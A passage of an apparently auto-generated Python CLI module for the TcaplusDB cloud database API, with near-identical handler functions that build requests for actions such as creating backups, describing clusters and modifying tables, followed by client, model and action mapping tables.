        show_help("CreateBackup", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
        "Remark": argv.get("--Remark"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.CreateBackupRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.CreateBackup(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doCreateTables(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("CreateTables", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "IdlFiles": Utils.try_to_json(argv, "--IdlFiles"),
        "SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
        "ResourceTags": Utils.try_to_json(argv, "--ResourceTags"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.CreateTablesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.CreateTables(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTableQuotas(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ModifyTableQuotas", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "TableQuotas": Utils.try_to_json(argv, "--TableQuotas"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyTableQuotasRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ModifyTableQuotas(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeClusters(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeClusters", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterIds": Utils.try_to_json(argv, "--ClusterIds"),
        "Filters": Utils.try_to_json(argv, "--Filters"),
        "Offset": Utils.try_to_json(argv, "--Offset"),
        "Limit": Utils.try_to_json(argv, "--Limit"),
        "Ipv6Enable": Utils.try_to_json(argv, "--Ipv6Enable"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeClustersRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeClusters(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDeleteTableGroup(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DeleteTableGroup", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "TableGroupId": argv.get("--TableGroupId"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DeleteTableGroupRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DeleteTableGroup(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTableGroupName(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ModifyTableGroupName", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "TableGroupId": argv.get("--TableGroupId"),
        "TableGroupName": argv.get("--TableGroupName"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyTableGroupNameRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ModifyTableGroupName(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doCreateTableGroup(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("CreateTableGroup", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "TableGroupName": argv.get("--TableGroupName"),
        "TableGroupId": argv.get("--TableGroupId"),
        "ResourceTags": Utils.try_to_json(argv, "--ResourceTags"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.CreateTableGroupRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.CreateTableGroup(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeRegions(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeRegions", g_param[OptionsDefine.Version])
        return
    param = {
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeRegionsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeRegions(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTasks(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeTasks", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterIds": Utils.try_to_json(argv, "--ClusterIds"),
        "TaskIds": Utils.try_to_json(argv, "--TaskIds"),
        "Filters": Utils.try_to_json(argv, "--Filters"),
        "Offset": Utils.try_to_json(argv, "--Offset"),
        "Limit": Utils.try_to_json(argv, "--Limit"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeTasksRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeTasks(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doModifyClusterTags(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ModifyClusterTags", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "ReplaceTags": Utils.try_to_json(argv, "--ReplaceTags"),
        "DeleteTags": Utils.try_to_json(argv, "--DeleteTags"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyClusterTagsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ModifyClusterTags(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doModifyTableGroupTags(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ModifyTableGroupTags", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "TableGroupId": argv.get("--TableGroupId"),
        "ReplaceTags": Utils.try_to_json(argv, "--ReplaceTags"),
        "DeleteTags": Utils.try_to_json(argv, "--DeleteTags"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyTableGroupTagsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ModifyTableGroupTags(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTableGroupTags(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeTableGroupTags", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "TableGroupIds": Utils.try_to_json(argv, "--TableGroupIds"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeTableGroupTagsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeTableGroupTags(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeTableGroups(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeTableGroups", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "TableGroupIds": Utils.try_to_json(argv, "--TableGroupIds"),
        "Filters": Utils.try_to_json(argv, "--Filters"),
        "Offset": Utils.try_to_json(argv, "--Offset"),
        "Limit": Utils.try_to_json(argv, "--Limit"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeTableGroupsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeTableGroups(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doCompareIdlFiles(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("CompareIdlFiles", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
        "ExistingIdlFiles": Utils.try_to_json(argv, "--ExistingIdlFiles"),
        "NewIdlFiles": Utils.try_to_json(argv, "--NewIdlFiles"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.CompareIdlFilesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.CompareIdlFiles(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeIdlFileInfos(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeIdlFileInfos", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "TableGroupIds": Utils.try_to_json(argv, "--TableGroupIds"),
        "IdlFileIds": Utils.try_to_json(argv, "--IdlFileIds"),
        "Offset": Utils.try_to_json(argv, "--Offset"),
        "Limit": Utils.try_to_json(argv, "--Limit"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeIdlFileInfosRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeIdlFileInfos(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDeleteTables(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DeleteTables", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DeleteTablesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DeleteTables(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doModifyTableMemos(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ModifyTableMemos", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "TableMemos": Utils.try_to_json(argv, "--TableMemos"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyTableMemosRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ModifyTableMemos(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doVerifyIdlFiles(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("VerifyIdlFiles", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "TableGroupId": argv.get("--TableGroupId"),
        "ExistingIdlFiles": Utils.try_to_json(argv, "--ExistingIdlFiles"),
        "NewIdlFiles": Utils.try_to_json(argv, "--NewIdlFiles"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.VerifyIdlFilesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.VerifyIdlFiles(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doClearTables(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ClearTables", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ClearTablesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ClearTables(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doModifyTables(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("ModifyTables", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "IdlFiles": Utils.try_to_json(argv, "--IdlFiles"),
        "SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.ModifyTablesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.ModifyTables(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTables(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeTables", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterId": argv.get("--ClusterId"),
        "TableGroupIds": Utils.try_to_json(argv, "--TableGroupIds"),
        "SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
        "Filters": Utils.try_to_json(argv, "--Filters"),
        "Offset": Utils.try_to_json(argv, "--Offset"),
        "Limit": Utils.try_to_json(argv, "--Limit"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeTablesRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeTables(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])


def doDescribeClusterTags(argv, arglist):
    g_param = parse_global_arg(argv)
    if "help" in argv:
        show_help("DescribeClusterTags", g_param[OptionsDefine.Version])
        return
    param = {
        "ClusterIds": Utils.try_to_json(argv, "--ClusterIds"),
    }
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile)
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeClusterTagsRequest()
    model.from_json_string(json.dumps(param))
    rsp = client.DescribeClusterTags(model)
    result = rsp.to_json_string()
    jsonobj = None
    try:
        jsonobj = json.loads(result)
    except TypeError as e:
        jsonobj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
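# Note (illustrative, not called by the CLI): every do* action above decodes
# the response with a try/except TypeError fallback because json.loads()
# rejected bytes input before Python 3.6; on those interpreters the response
# body must be decoded to str first. A hypothetical standalone version of
# that fallback, for clarity:
def _loads_compat_example(result):
    import json
    try:
        return json.loads(result)
    except TypeError:
        # Older Python 3: json.loads() only accepts str, so decode first.
        return json.loads(result.decode('utf-8'))
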
CLIENT_MAP = {
"v20190823": tcaplusdb_client_v20190823,
}
MODELS_MAP = {
"v20190823": models_v20190823,
}
ACTION_MAP = {
"DescribeTableTags": doDescribeTableTags,
"ModifyTableTags": doModifyTableTags,
"CreateCluster": doCreateCluster,
"DescribeUinInWhitelist": doDescribeUinInWhitelist,
"DescribeTablesInRecycle": doDescribeTablesInRecycle,
"RollbackTables": doRollbackTables,
"ModifyClusterName": doModifyClusterName,
